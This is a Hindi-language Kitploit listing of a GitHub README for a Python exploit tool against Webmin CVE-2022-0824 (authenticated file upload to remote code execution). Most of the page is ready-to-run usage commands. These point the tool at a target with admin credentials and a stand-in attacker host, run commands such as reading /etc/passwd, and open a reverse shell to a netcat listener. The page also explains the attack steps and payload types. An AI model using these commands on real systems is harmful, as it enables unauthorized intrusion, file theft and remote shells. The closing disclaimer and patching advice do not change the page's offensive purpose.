Webmin-CVE-2022-0824-Enhanced-Exploit — Webmin CVE-2022-0824 के लिए Python एक्सप्लॉइट जिसमें दो-मोड समर्थन है: सीधे कमांड निष्पादन और रिवर्स शेल। इसमें कई पेलोड प्रकार, बुद्धिमान फ़ाइल प्रबंधन, और अधिकृत सुरक्षा परीक्षण के लिए विस्तृत डीबग लॉगिंग शामिल हैं। | Kitploit
उपकरण / GitHub / nudttan91 / webmin-cve-2022-0824-enhanced-exploit
nudttan91/webmin-cve-2022-0824-enhanced-exploit
Webmin-CVE-2022-0824-Enhanced-Exploit Webmin CVE-2022-0824 के लिए Python एक्सप्लॉइट जिसमें दो-मोड समर्थन है: सीधे कमांड निष्पादन और रिवर्स शेल। इसमें कई पेलोड प्रकार, बुद्धिमान फ़ाइल प्रबंधन, और अधिकृत सुरक्षा परीक्षण के लिए विस्तृत डीबग लॉगिंग शामिल हैं।
8 1 साल पहलेहमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।
पिछले 7 दिन पिछले 30 दिन
Webmin-CVE-2022-0824-Enhanced-Exploit
[!IMPORTANT]
Webmin CVE-2022-0824 उन्नत शोषण उपकरण - कमांड निष्पादन और रिवर्स शेल दोहरे मोड का समर्थन करता है
[!IMPORTANT]
Webmin CVE-2022-0824 भेद्यता के लिए एक उन्नत शोषण उपकरण, जो सीधे कमांड निष्पादन और रिवर्स शेल दो मोड का समर्थन करता है।
🚀 विशेषताएँ
✅ दोहरे मोड समर्थन : कमांड निष्पादन मोड + रिवर्स शेल मोड
✅ एकाधिक पेलोड : Perl, Bash, Python तीन अलग-अलग पेलोड
✅ बुद्धिमान फ़ाइल प्रबंधन : स्वचालित रूप से अद्वितीय फ़ाइल नाम उत्पन्न करता है, फ़ाइल विरोध से बचाता है
✅ अनिवार्य ओवरराइट अपलोड : मौजूदा फ़ाइलों के ओवरराइट को स्वचालित रूप से संभालता है
✅ एकाधिक अपलोड विधियाँ : HTTP डाउनलोड, सीधे अपलोड, कमांड निष्पादन द्वारा निर्माण
✅ विस्तृत डीबग जानकारी : पूर्ण निष्पादन प्रक्रिया लॉग
✅ उपयोगकर्ता-अनुकूल इंटरफ़ेस : रंगीन आउटपुट और स्पष्ट स्थिति संकेत
📋 भेद्यता जानकारी
CVE संख्या : CVE-2022-0824
प्रभावित संस्करण : Webmin < 1.990
भेद्यता प्रकार : मनमानी फ़ाइल अपलोड के कारण दूरस्थ कोड निष्पादन
CVSS स्कोर : 9.8 (गंभीर)
🛠️ स्थापना आवश्यकताएँ # Python 3.6+
pip3 install requests urllib3
📖 उपयोग विधि
कमांड निष्पादन मोड (अनुशंसित) # बुनियादी कमांड निष्पादन
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# सिस्टम जानकारी देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# फ़ाइलें सूचीबद्ध करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# संवेदनशील फ़ाइलें देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# नेटवर्क जानकारी
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
रिवर्स शेल मोड # 1. लिसनर प्रारंभ करें
nc -nlvp 9999
# 2. शोषण निष्पादित करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
📝 पैरामीटर स्पष्टीकरण पैरामीटर विवरण आवश्यक उदाहरण -t, --targetलक्ष्य Webmin URL ✅ http://192.168.1.100:10000/-c, --credentialलॉगिन क्रेडेंशियल ✅ admin:password-LS, --py3http_serverHTTP सर्वर पता ✅ 192.168.1.50:8080--shellनिष्पादित करने के लिए कमांड ❌ "ls -la"-L, --callback_ipरिवर्स शेल कॉलबैक IP ❌* 192.168.1.50-P, --callback_portरिवर्स शेल कॉलबैक पोर्ट ❌* 9999
*नोट: रिवर्स शेल मोड में आवश्यक
🎯 उपयोग उदाहरण
उदाहरण 1: सिस्टम जानकारी संग्रह python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
उदाहरण 2: फ़ाइल सिस्टम अन्वेषण python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
उदाहरण 3: नेटवर्क कॉन्फ़िगरेशन देखना python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
🔧 कार्य सिद्धांत
लॉगिन प्रमाणीकरण : प्रदान किए गए क्रेडेंशियल का उपयोग करके Webmin प्रबंधन इंटरफ़ेस में लॉगिन करें
पेलोड निर्माण : मोड के अनुसार संबंधित CGI स्क्रिप्ट उत्पन्न करें
फ़ाइल अपलोड : फ़ाइल प्रबंधक के HTTP डाउनलोड फ़ंक्शन के माध्यम से पेलोड अपलोड करें
अनुमति सेटिंग : अपलोड की गई फ़ाइलों के लिए निष्पादन अनुमतियाँ सेट करें
कमांड निष्पादन : अपलोड की गई CGI स्क्रिप्ट तक पहुँचें और कमांड निष्पादित करें या रिवर्स कनेक्शन स्थापित करें
🛡️ सुरक्षा सुझाव
Webmin को नवीनतम संस्करण (>= 1.990) में अपडेट करें
Webmin प्रबंधन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें
मजबूत पासवर्ड और दो-कारक प्रमाणीकरण का उपयोग करें
सिस्टम लॉग का नियमित ऑडिट करें
वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें
⚠️ अस्वीकरण यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
🚫 अनधिकृत सिस्टम पर उपयोग निषिद्ध
🚫 दुर्भावनापूर्ण हमलों के लिए उपयोग निषिद्ध
🚫 उपयोगकर्ता संबंधित कानूनी जिम्मेदारी वहन करेगा
✅ केवल स्पष्ट रूप से अधिकृत वातावरण में उपयोग करें
✅ सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए उपयोग करें
📚 तकनीकी विवरण
पेलोड प्रकार
Perl CGI : मुख्य पेलोड, सबसे अच्छी संगतता
Bash CGI : बैकअप पेलोड, Linux सिस्टम के लिए उपयुक्त
Python CGI : बैकअप पेलोड, सबसे समृद्ध कार्यक्षमता
अपलोड विधियाँ
HTTP डाउनलोड : Webmin फ़ाइल प्रबंधक की दूरस्थ डाउनलोड सुविधा के माध्यम से
सीधे अपलोड : फ़ाइल अपलोड इंटरफ़ेस के माध्यम से
कमांड निर्माण : सिस्टम कमांड के माध्यम से फ़ाइल बनाना
फ़ाइल नामकरण रणनीति
कमांड सामग्री के MD5 हैश पर आधारित
टाइमस्टैम्प प्रत्यय
सुनिश्चित करें कि प्रत्येक निष्पादन में अलग-अलग फ़ाइल नाम का उपयोग किया जाए
🔄 अद्यतन लॉग
v5.0 (2025-08-05)
✨ कमांड निष्पादन मोड जोड़ा गया
🐛 फ़ाइल ओवरराइट समस्या ठीक की गई
🔧 फ़ाइल नामकरण रणनीति में सुधार किया गया
📈 त्रुटि हैंडलिंग बढ़ाई गई
v4.0 (मूल पर आधारित)
🎯 faisalfs10x के मूल कोड पर आधारित
🔧 CGI संगतता में सुधार किया गया
📝 विस्तृत लॉग जोड़े गए
🤝 योगदान Issue और Pull Request सबमिट करने का स्वागत है!
इस प्रोजेक्ट को Fork करें
एक फीचर ब्रांच बनाएं (git checkout -b feature/AmazingFeature)
परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
Pull Request खोलें
📄 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के तहत है - विवरण के लिए LICENSE फ़ाइल देखें
🙏 आभार
📞 संपर्क यदि कोई प्रश्न या सुझाव हो, तो कृपया निम्नलिखित माध्यमों से संपर्क करें:
📧 GitHub Issue सबमिट करें
🐛 सुरक्षा मुद्दों की रिपोर्ट करने के लिए कृपया निजी संदेश भेजें
⭐ यदि यह प्रोजेक्ट आपके लिए उपयोगी है, तो कृपया एक Star देकर समर्थन करें!
🔗 संबंधित लिंक
requirements.txt requests>=2.25.1
urllib3>=1.26.0